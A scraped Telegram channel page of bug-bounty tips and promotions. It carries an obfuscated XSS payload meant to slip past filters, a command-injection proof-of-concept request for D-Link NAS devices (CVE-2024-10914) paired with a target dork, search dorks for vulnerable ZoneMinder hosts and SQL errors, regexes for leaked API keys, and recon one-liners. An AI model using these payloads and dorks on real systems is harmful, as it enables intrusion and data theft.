Brut Security
15.3K subscribers
968 photos
77 videos
293 files
1.01K links
โœ…DM: @wtf_brut
๐Ÿ›ƒWhatsApp: https://wa.link/brutsecurity
๐ŸˆดTraining: https://brutsecurity.com
๐Ÿ“จMail: info@brutsec.com
Download Telegram
Find sensitive files using Wayback

waybackurls 123.com | grep - -color -E "1.xls | \\.tar.gz | \\.bak | \\.xml | \\.xlsx | \\.json | \\.rar | \\.pdf | \\.sql | \\.doc | \\.docx | \\.pptx | \\.txt | \\.zip | \\.tgz | \\.7z"


#bugbountytip #bugbounty #bugbountytips
1๐Ÿ‘13โค4๐Ÿ”ฅ3
a XSS payload with Alert Obfuscation, for bypass Regex filter

<img src="X" onerror=top[8680439..toString(30)](1337)>

<script>top[8680439..toString(30)](1337)</script>


#infosec #cybersec #bugbountytip
โค11๐Ÿ‘6
Reduce Noise in Burp Suite with This Simple Trick! ๐Ÿ”ฅ

๐Ÿ’ก Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:


.*\.google\.com

.*\.gstatic\.com

.*\.googleapis\.com

.*\.pki\.goog

.*\.mozilla\..*

If you have any other filters to do share, drop it on comments!
1โค15๐Ÿ‘9
๐Ÿ”–Search for leaked Api keys on ๐Ÿ“ฑgithub

โฌ‡๏ธAzure open AI
AZURE_OPENAI_API_KEY /[a-f0-9]{32}$/


โฌ‡๏ธJira token
/ATATT3[a-zA-Z0-9_\-+=]{184,195}$/


#CyberSecurity #BugBounty #infosec #BugBountyTools #pentest #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘4โค1
๐Ÿณ10
โค6๐Ÿ‘1
Check for Subdomain Takeover Vulnerabilities

This enumerates subdomains and checks if they resolve. Subdomains that return NXDOMAIN may be vulnerable to takeover if they point to external services.

subfinder -d target.com -silent | while read sub; do host $sub; done | grep "NXDOMAIN"


Replace nasa.gov with your target.
๐Ÿ‘12๐Ÿ—ฟ6
โ˜„๏ธ Level Up Your Hacking Skills with Hack The Box Pro Labs! โ˜„๏ธ

Hey everyone!
๐Ÿ”ฅ If you're looking to take your hacking journey to the next level, Hack The Box just expanded its Pro Labs with 8 new Mini Pro Labs! These advanced labs offer realistic, enterprise-level challenges that dive deep into red teaming, network exploitation, and more.

๐Ÿ’ฅ And hereโ€™s the best part โ€“ you can now get 25% off the Pro Labs Bundle annual subscription until the end of November! Just use my affiliate link to sign up and support the channel: https://hacktheboxltd.sjv.io/YRDZKJ

โœ”๏ธ Why go Pro?
- Access challenging, real-world environments to hone your skills.- Tackle new labs like Odyssey and Ascension as they roll out.
- Join a community of dedicated hackers pushing their skills to new heights.

๐Ÿ–ฅ Get your Pro Labs Bundle now and make the most of this limited-time discount! โœ๏ธ Sign Up Here

Letโ€™s hack and learn together!
๐Ÿ”ฅโ–ถ๏ธ๐Ÿ“Œ #HackTheBox #ProLabs #Cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘3โค2๐Ÿ”ฅ1
โ˜„๏ธBug Bounty Tip: Finding Confidential Documents Fastโ˜„๏ธ

1.Use Katana to scan for document URLs:
katana -u subdomainsList -em pdf,docx | tee endpointsPDF_DOC

2. Filter for potentially unredacted files:
grep -i 'redacted.*\.pdf$' endpointsPDF_DOC | sed -E 's/[-_]?redacted//gi' | sort -u | httpx -mc 200 -sc


This script finds document URLs with "redacted" in the name, strips it out, and checks if the unredacted version is accessible.

Admins often leave these unredacted files online by mistake, making them a high-medium (P3) severity finding for bug bounty programs.
Please open Telegram to view this post
VIEW IN TELEGRAM
1โค14๐Ÿ‘5
๐ŸšจCVE-2024-51482: A 10/10 Severity Vulnerability Exposes ZoneMinderโ€™s SQL Databases

๐Ÿ‘‡Dorks
HUNTER:/product.name="ZoneMinder"
SHODAN: http.favicon.hash:-1218152116
FOFA: app="ZoneMinder"

๐Ÿ“ฐRefer: https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/

#ZoneMinder #SQL #hunterhow #infosec #infosecurity #OSINT #Vulnerability
2๐Ÿ‘7โค2
If youโ€™re new to malware development, this playlist is a solid introduction! It covers:
โ€ข Native API
โ€ข A quick refresher on processes, threads, and handles
โ€ข Syscalls

Check it out here:
YouTube Playlist
๐Ÿ”ฅ9
This media is not supported in the widget
VIEW IN TELEGRAM
๐Ÿ—ฟ31๐Ÿ‘5๐Ÿณ5
Please open Telegram to view this post
VIEW IN TELEGRAM
1๐Ÿ‘10โค1
๐Ÿ—ฟ8๐Ÿ‘2๐Ÿ”ฅ2โค1๐Ÿณ1
โš ๏ธA tool to embed XXE and XSS payloads in docx, odt, pptx, xlsx files (oxml_xxe on steroids)

โ˜„๏ธhttps://github.com/whitel1st/docem
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ6๐Ÿ‘4โค2
Have 5 Tryhackme (1 Month) Voucher
For Indians Only. Price 350 Rupees
Dm
@brutsecurity_bot
๐Ÿ‘2
๐Ÿš€ Google Dorking - SQL Errors

site:[TARGET] AND (intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()")
๐Ÿ‘4
cve-2024-10914

GET

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27

FOFA๏ผšapp =D_Link-DNS-ShareCenter

#exploit #poc #IoT
๐Ÿ—ฟ6๐Ÿ‘3โค1
This media is not supported in the widget
VIEW IN TELEGRAM
๐Ÿ—ฟ17โค1๐Ÿ‘1๐Ÿ”ฅ1